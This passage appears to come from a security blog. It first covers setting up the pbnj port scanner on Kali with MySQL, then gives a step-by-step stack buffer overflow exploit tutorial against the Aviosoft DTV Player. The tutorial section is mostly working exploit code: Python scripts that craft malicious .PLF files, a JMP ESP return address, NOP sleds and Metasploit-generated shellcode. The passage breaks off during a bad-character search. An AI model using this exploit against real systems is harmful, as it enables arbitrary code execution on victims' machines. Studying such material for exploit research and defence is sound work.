# Host for the database. For SQLite no host is needed.
host: localhost
# Port for the database. For SQLite no port is needed.
port: 3306

In Kali the MySQL password is blank and the username is "root". You should really change the username and password, but I am doing it without changing anything. So let's configure MySQL:
root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> create database pbnjdb;
Query OK, 1 row affected (0.00 sec)

mysql>

We are ready to go now:

root@find:~# scanpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.
Usage: scanpbnj [Options] {target specification}

Target Specification:
Can pass hostnames, IP addresses, networks, etc.
Ex: microsoft.com, 192.168.0.1, 192.168.1.1/24, 10.0.0.1-254
-i --iplist <iplist> Scan using a list of IPs from a file
-x --xml <xml-file> Parse scan/info from Nmap XML file

Scan Options:
-a --args <args> Execute Nmap with args (needs quotes)
-e --extraargs <args> Add args to the default args (needs quotes)
--inter <interface> Perform Nmap Scan using non default interface
-m --moreports <ports> Add ports to scan ex: 8080 or 3306,5900
-n --nmap <path> Path to Nmap executable
-p --pingscan Ping Target then scan the host(s) that are alive
--udp Add UDP to the scan arguments
--rpc Add RPC to the scan arguments
-r --range <ports> Ports for scan [def 1-1025]

--diffbanner Parse changes of the banner

Config Options:
-d --dbconfig <config> Config for results database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]
--dir <dir> Directory for SQLite or CSV file [def . ]

General Options:
--nocolors Don't Print Colors
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )

Now let’s scan ports:

root@find:~# scanpbnj -a "-sS"  localhost
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.

--------------------------------------
Starting Scan of 127.0.0.1
Inserting Machine
Inserting Service on 3306:tcp mysql
Inserting Service on 5432:tcp postgresql
Scan Complete for 127.0.0.1
--------------------------------------


In the command above, the “-a” option passes “-sS” as the Nmap argument. The scan finished and the results should have been written to the database. Let’s check:

root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 52
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use pbnjdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
-> ;
+------------------+
| Tables_in_pbnjdb |
+------------------+
| machines |
| services |
+------------------+
2 rows in set (0.00 sec)

mysql> select * from services;
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| mid | service | state | port | protocol | version | banner | machine_updated | updated_on |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| 12 | mysql | up | 3306 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
| 12 | postgresql | up | 5432 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
2 rows in set (0.00 sec)

mysql>

mysql> select * from machines;
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| mid | ip | host | localh | os | machine_created | created_on |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| 1 | 192.168.2.92 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 2 | 192.168.2.96 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 3 | 192.168.2.91 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 4 | 192.168.2.98 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 5 | 192.168.2.99 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 6 | 192.168.2.100 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 7 | 192.168.2.97 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 8 | 192.168.2.94 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 9 | 192.168.2.93 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 10 | 192.168.2.90 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 11 | 192.168.2.95 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 12 | 127.0.0.1 | localhost | 1 | unknown os | 1364339543 | Tue Mar 26 19:12:23 2013 |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
12 rows in set (0.00 sec)

mysql>
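As an added example of what the machines/services tables above make possible once a few scans have been stored (this is not pbnj’s own query set, and it uses SQLite in place of MySQL): constructed rows for a second scan of localhost are loaded next to the ones from the page, and two queries report services that are new in the latest scan and services whose version or banner changed since the previous scan.

```python
import sqlite3

# Same column layout as the pbnj machines/services tables shown above.
SCHEMA = """
CREATE TABLE machines (mid INTEGER, ip TEXT, host TEXT, localh INTEGER, os TEXT,
                       machine_created INTEGER, created_on TEXT);
CREATE TABLE services (mid INTEGER, service TEXT, state TEXT, port INTEGER,
                       protocol TEXT, version TEXT, banner TEXT,
                       machine_updated INTEGER, updated_on TEXT);
"""

MACHINES = [
    (12, "127.0.0.1", "localhost", 1, "unknown os", 1364339543, "Tue Mar 26 19:12:23 2013"),
]

# First two rows are the page's scan; the rest are a constructed second scan
# ten minutes later in which mysql now reports a version and ssh has appeared.
SERVICES = [
    (12, "mysql",      "up", 3306, "tcp", "unknown version", "unknown product", 1364339543, "Tue Mar 26 19:12:23 2013"),
    (12, "postgresql", "up", 5432, "tcp", "unknown version", "unknown product", 1364339543, "Tue Mar 26 19:12:23 2013"),
    (12, "mysql",      "up", 3306, "tcp", "5.5.28-1",        "MySQL",           1364340143, "Tue Mar 26 19:22:23 2013"),
    (12, "postgresql", "up", 5432, "tcp", "unknown version", "unknown product", 1364340143, "Tue Mar 26 19:22:23 2013"),
    (12, "ssh",        "up",   22, "tcp", "unknown version", "unknown product", 1364340143, "Tue Mar 26 19:22:23 2013"),
]

# Services in a machine's latest scan that have no row for the same
# port/protocol in any earlier scan of that machine.
NEW_SERVICES_SQL = """
SELECT m.ip, s.port, s.protocol, s.service
FROM services s JOIN machines m ON m.mid = s.mid
WHERE s.machine_updated = (SELECT MAX(machine_updated) FROM services WHERE mid = s.mid)
  AND NOT EXISTS (SELECT 1 FROM services p
                  WHERE p.mid = s.mid AND p.port = s.port AND p.protocol = s.protocol
                    AND p.machine_updated < s.machine_updated)
ORDER BY s.port
"""

# Services present in both the latest and the previous scan of a machine
# whose version or banner differs between the two.
CHANGED_SERVICES_SQL = """
SELECT m.ip, cur.port, cur.protocol, prev.version, cur.version, prev.banner, cur.banner
FROM services cur
JOIN services prev ON prev.mid = cur.mid AND prev.port = cur.port
                  AND prev.protocol = cur.protocol
JOIN machines m ON m.mid = cur.mid
WHERE cur.machine_updated = (SELECT MAX(machine_updated) FROM services WHERE mid = cur.mid)
  AND prev.machine_updated = (SELECT MAX(machine_updated) FROM services
                              WHERE mid = cur.mid AND machine_updated < cur.machine_updated)
  AND (prev.version <> cur.version OR prev.banner <> cur.banner)
ORDER BY cur.port
"""


def load_db():
    """Build the in-memory stand-in for pbnjdb from the rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO machines VALUES (?,?,?,?,?,?,?)", MACHINES)
    conn.executemany("INSERT INTO services VALUES (?,?,?,?,?,?,?,?,?)", SERVICES)
    return conn


def new_services(conn):
    return conn.execute(NEW_SERVICES_SQL).fetchall()


def changed_services(conn):
    return conn.execute(CHANGED_SERVICES_SQL).fetchall()


if __name__ == "__main__":
    db = load_db()
    for row in new_services(db):
        print("NEW    ", row)
    for row in changed_services(db):
        print("CHANGED", row)
```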

There is another tool installed called outputpbnj, which can be used to dump the results without logging into MySQL manually.

root@find:~# locate outputpbnj
/usr/bin/outputpbnj
/usr/share/man/man1/outputpbnj.1p.gz

root@find:~# outputpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Usage: outputpbnj [Query Options] [Config Options] [General Options]
Query Options:
-q --query <name> Perform sql query
-t --type <type> Output Type [csv,tab,html]
-f --file <filename> Store the result in file otherwise stdout
--both Print results and store them in a file
--dir <dir> Store the result in this directory [def .]

-l --lookup <name> Lookup descrition based on name
--list List of names and descriptions
-n --name Lookup all the names
-d --desc Lookup all the descriptions
-s --sql Lookup all the sql queries

Config Options:
--qconfig <file> Config of sql queries [def query.yaml]
--dbconfig <file> Config for accessing database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]

General Options:
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )


Okay, let’s dump the latest result:

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Error in option spec: "test|=s"
Error in option spec: "debug|=s"

wtf!

It is not working as expected. No problem, I am going to edit “outputpbnj” (a Perl script). I have to remove the “|” from “test” and “debug”. Kali Linux uses the Leafpad text editor, so “leafpad /usr/bin/outputpbnj”, or you can use gedit or kate/kwrite (KDE). Then search for “test|=s”:

GetOptions(
    \%options,
    'type|t=s', 'file|f=s', 'lookup|l=s', 'both|b',
    'query|q=s', 'names|n', 'desc|d', 'sql|s', 'list',
    'dbconfig=s', 'configdir=s', 'dir=s', 'data=s', 'qconfig=s',
    'test|=s', 'debug|=s',
    'help|h' => sub { help(); },
    'version|v' => sub { print_version(); },
    'both' => sub { $bothOutput = 1 },
)
or exit 1;

Just remove the pipe “|” from “test” and “debug”, so they read ‘test=s’, ‘debug=s’. Now save and run:

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Tue Mar 26 19:12:23 2013 localhost mysql up unknown versiontcp
Tue Mar 26 19:12:23 2013 localhost postgresql up unknown version tcp


It is possible to save the output in a different format. For example:

root@find:~# mkdir pbnjr
root@find:~# outputpbnj -q latestinfo -t html -f pbnjr/report.html
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.

root@find:~# cd pbnjr
root@find:~/pbnjr# ls
report.html
root@find:~/pbnjr# iceweasel report.html
root@find:~/pbnjr#

Another curiosity: can I use only one query (“-q”), or are there more? There are more; I can use many query names:

possiblevuln
sshmachines
allservices
services
unknown_version_up
unknown_banner_up
machines
mdump
servicesup
service_audit 

All the query names are available in the outputpbnj script (with descriptions)!

This kind of tool is really useful for vulnerability assessment. pbnj is really a nice tool.

Exploit writing – Stack based Buffer overflow

There are many exploit writing tutorials, but Corelan’s exploit writing tutorials are much, much better. If you want to learn exploit development, of course you may get started with Corelan too. Anyway,

Today I tried to exploit an application found at http://www.exploit-db.com/exploits/22932/ (the exploit script there did not work for me). Exploiting the vulnerability was very easy, but finding the bad chars was a bit tricky. At least I was able to find all the bad chars using Corelan’s mona.py and exploited the application successfully. The following tools I used to develop the exploit:

1. VMware Workstation.

2. Python.

3. Immunity Debugger.

4. mona.py (copy mona.py to “C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands”).

5. Windows XP SP3 and Windows 7.

6. Metasploit.

If you are going to try/build this exploit yourself then you also need the tools above, so make sure to download them as your preparation.

I downloaded the vulnerable application first and installed it on a Windows XP SP3 VM.

CRASH AND LENGTH OF BUFFER

The simple crash script was:

print "Creating exploit."
f=open("crash-me.PLF","w")
push="A" * 2000

try:
    f.write(push)
    f.close()
    print "File created"
except:
    print "File cannot be created"

It will create a file “crash-me.PLF”. If I open the file in AviSoft DTV Player then it just crashes. Well, let’s attach Immunity Debugger to see what is happening.

Click on Debug >> Run.

Now let’s open “crash-me.PLF”:

So it finally crashed and I saw that the ESP and EIP registers contain “AAAAAAAA….”:

This clearly indicates that I control EIP, which means the crash is really exploitable (explained later!). Now it is time to find how many bytes on the stack are required to overwrite EIP. So it is time to work with a great tool, mona.py. There was an old, awkward way to do that, but now we can do it very easily using Metasploit or mona.py. We already know the application crashed since we sent 2000 bytes of junk. So we will create a cyclic pattern using mona.

First I set the default working folder for mona:

!mona config -set workingfolder c:\mona\%p

Then the mona command is:

!mona pattern_create 2000

It just created a file in C:\mona\AviosoftDTV called “pattern.txt”. This time I need to edit the script again and put the cyclic pattern in place of the “A”s. The full script looks like this:

print "Creating exploit."
f=open("crash-me.PLF","w")
push=("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"
"Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9"
"Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co") #2000-byte pattern from !mona pattern_create 2000

try:
    f.write(push)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Replacing “A”*2000 with the pattern generated by mona.

Now I need to regenerate the “crash-me.PLF” file and open it with AviSoft DTV (already attached to the debugger). So the application crashed again, but with mona’s cyclic pattern instead of “AAAAAA…”. So I need to take note of the EIP value. In my case it is “37694136”:

This time we need to figure out the exact number of bytes needed to overwrite EIP. For this mona is enough:

!mona pattern_offset 37694136

It tells us that we need 260 bytes to fill the stack and 4 more bytes to overwrite EIP. So it is 260+4=264 bytes.
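Since pattern_create and pattern_offset are the whole of this step, here is an added Python re-implementation (my own code, not mona’s or Metasploit’s) of the cyclic pattern and the offset lookup, checked against the values in this post: the 2000-byte pattern starting Aa0Aa1… and the EIP value 37694136, which has to come out at offset 260. It is the same triage step a crash analyst uses to tell a return-address overwrite from a random crash.

```python
import string


def pattern_create(length):
    """Cyclic pattern in the Metasploit/mona style (Aa0Aa1...Aa9Ab0...): every
    4-byte window is unique within one period of 26*26*10*3 = 20280 bytes."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("length exceeds the pattern period")


def pattern_offset(register_value, length=2000):
    """Offset of a crashed register's value inside the pattern, or -1.
    The register holds the bytes little-endian, so 0x37694136 is the text '6Ai7'."""
    needle = register_value.to_bytes(4, "little")
    return pattern_create(length).find(needle)


def eip_layout(register_value, total=2000):
    """Split the original buffer the way the post does:
    (bytes before EIP, the 4 bytes of EIP, bytes left over)."""
    offset = pattern_offset(register_value, total)
    if offset < 0:
        raise ValueError("register value does not come from this pattern")
    return offset, 4, total - offset - 4


if __name__ == "__main__":
    print(pattern_create(2000)[:30])   # b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9'
    print(pattern_offset(0x37694136))  # 260
    print(eip_layout(0x37694136))      # (260, 4, 1736)
```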

Let’s modify the script again:

print "Creating exploit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Found by mona.py
eip ="BBBB" #4 more bytes to overwrite EIP
junk="C"*1736 #Later will replace this with real shellcode

try:
    f.write(push+eip+junk)
    f.close()
    print "File created"
except:
    print "File cannot be created"

In the script I replaced the cyclic pattern with 260 bytes of “A”, 4 more bytes “BBBB” to overwrite EIP, and then 1736 bytes (2000-264). If the length of the first junk (260 bytes) is right then EIP will be “BBBB”. Let’s try:

See, EIP is 42424242=BBBB and ESP (the stack pointer) contains CCCC…. But here I see another problem: after EIP there are some “CCCC”:

0012EB5C   42424242  BBBB
0012EB60 43434343 CCCC
0012EB64 43434343 CCCC
0012EB68 43434343 CCCC
0012EB6C 43434343 CCCC


We really need to jump over this nasty junk; see later on. Anyway, we see we are controlling EIP, because it contains “BBBB”.

Our next goals will be:

1. Replacing “BBBB” with a valid pointer (a pointer to ESP, and ESP will hold the shellcode).
2. Solving the easy problem of the “CCCC…” after EIP.
3. Replacing “CCCCCC…” with real shellcode.

FIND EIP
Let’s find an EIP address. The EIP address can be found in the application’s DLLs or in an OS DLL. For reliability we should always try to use the application’s DLLs if possible. So in this application I am going to find the EIP from the application’s DLLs. Again I will use mona (mona is very powerful and I know what I am doing). So the command should be:

!mona jmp -r esp -o


It will create a file called “jmp.txt” in “C:\mona\AviosoftDTV” with the following contents:

0x6034c153 : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034c4db : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034d9cb : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034dc73 : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x640614e3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll)
0x640627a3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll)
0x64119bc3 : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\NetReg.dll)
0x6411a7ab : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\NetReg.dll)

Here I will use 0x6411a7ab. Before that, for learning purposes, let’s find this address manually using Immunity Debugger itself (first we need to trigger the crash, otherwise not all DLLs will be loaded properly):

1. Immunity Debugger menu: View >> View Executable Modules.
2. Find “NetReg.dll” and double click on it:

3. Our goal is finding “JMP ESP”.
4. Right click on the window and Search For >> All Commands >>

5. Now another window will pop up; search for “jmp esp”.

I kept searching until I found 0x6411a7ab.

ATTEMPT TO EXECUTE SHELLCODE
Anyway, let’s get back to real work. We need to modify the script and put the address in the EIP variable instead of “BBBB”. We should remember that Windows is little endian, meaning we need to reverse the byte order of the address, so EIP should be 0x6411a7ab = “\xab\xa7\x11\x64”. Here is the modified script:

print "Creating exploit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Found by mona.py
eip ="\xab\xa7\x11\x64" #EIP: 0x6411a7ab in little-endian byte order
junk="C"*1500 #Later will replace this with real shellcode

try:
    f.write(push+eip+junk)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Let’s run the application through the debugger and it should now have the exact address I set. Time to make the application execute the shellcode. So I am modifying the script again to make it safer:

print "Creating exploit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260 #Found by mona.py, "A" replaced with NOPs
eip ="\xab\xa7\x11\x64" #EIP
junk="\x90"*500 #More NOPs before reaching the shellcode
shellcode="D"*1000 #Will replace with shellcode.
try:
    f.write(push+eip+junk+shellcode)
    f.close()
    print "File created"
except:
    print "File cannot be created"

What I did in the script above is replace all the “A”s with NOPs. A NOP means do nothing but pass to the next instruction (not a bad idea?). Earlier I mentioned that after EIP we see some unnecessary “CCCCCC…” which would completely break our exploit. Putting enough NOPs solves this problem too. Before going to the next step let’s test whether it is working as I expected.

1. Set a breakpoint at the EIP address 0x6411a7ab to make sure that our exploit reaches the right address. To do that we need the following:

Right click >> Go to >> Expression

2. When the new window pops up, search for the EIP address; you may need to search twice. If the address is found then we will see this:

3. Now press F2. It may warn you about setting a breakpoint at this address, but you can ignore the warning. Well, now I am going to open the file (attached to the debugger). It hits the breakpoint and I can see that I am landing in the NOPs directly:

So it worked!

Let’s put real shellcode in place of the “D”s. It is time to use Metasploit to generate windows/exec shellcode that executes calc.exe:

msfpayload windows/exec cmd=calc R |msfencode -b "\x00\x0a" -t c

I tried to avoid the usual bad chars “\x00\x0a”. Metasploit generated the following shellcode:

[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)


Anyway, let’s modify the script again:

print "Creating exploit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260 #Found by mona.py
eip ="\xab\xa7\x11\x64" #EIP
junk="\x90"*500 #500 NOPs before real shellcode
shellcode=("\xbe\x28\xc7\x1b\x1f\xd9\xed\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x32\x31\x70\x12\x83\xe8\xfc\x03\x58\xc9\xf9\xea\x64\x3d\x74"
"\x14\x94\xbe\xe7\x9c\x71\x8f\x35\xfa\xf2\xa2\x89\x88\x56\x4f"
"\x61\xdc\x42\xc4\x07\xc9\x65\x6d\xad\x2f\x48\x6e\x03\xf0\x06"
"\xac\x05\x8c\x54\xe1\xe5\xad\x97\xf4\xe4\xea\xc5\xf7\xb5\xa3"
"\x82\xaa\x29\xc7\xd6\x76\x4b\x07\x5d\xc6\x33\x22\xa1\xb3\x89"
"\x2d\xf1\x6c\x85\x66\xe9\x07\xc1\x56\x08\xcb\x11\xaa\x43\x60"
"\xe1\x58\x52\xa0\x3b\xa0\x65\x8c\x90\x9f\x4a\x01\xe8\xd8\x6c"
"\xfa\x9f\x12\x8f\x87\xa7\xe0\xf2\x53\x2d\xf5\x54\x17\x95\xdd"
"\x65\xf4\x40\x95\x69\xb1\x07\xf1\x6d\x44\xcb\x89\x89\xcd\xea"
"\x5d\x18\x95\xc8\x79\x41\x4d\x70\xdb\x2f\x20\x8d\x3b\x97\x9d"
"\x2b\x37\x35\xc9\x4a\x1a\x53\x0c\xde\x20\x1a\x0e\xe0\x2a\x0c")
shellcode+="\x90"*900 #Okay, need enough junk, so NOPs instead of "A"

all=push+eip+junk+shellcode

try:
    f.write(all)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Well, regenerate the “crash-me.PLF” file and open it with the attached AviSoft DTV, but unfortunately it just crashed….

It does not even land in the NOPs (wtf!). It seems this is happening because of bad chars: some of the code has been truncated. But no problem, we can find the bad chars using mona, and this was my new knowledge today: learning to use mona to find bad chars easily. Bad chars can corrupt or truncate our shellcode. If there are any bad chars then our exploit won’t work!

So instead of spending much time I am going to use mona to find the bad chars (this is a good idea). I am using the first crash PoC again. Let’s see how I did it.


FINDING BAD CHARS
The first command:

!mona bytearray -b "\x00"

“\x00” is a common bad char, so I excluded it when generating all the byte values with mona.

Mona created two files in C:\mona\AviosoftDTV: 1. bytearray.txt 2. bytearray.bin. bytearray.bin is the binary that will be needed later for comparing.

Well, bytearray.txt has the following contents:

Modify the script and put the generated output into the script right after the variable push=”A”*2000:

print "Creating exploit."
f=open("badchar.PLF","w") #Create the file

push="A"*2000 #Found by mona.py
push+=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
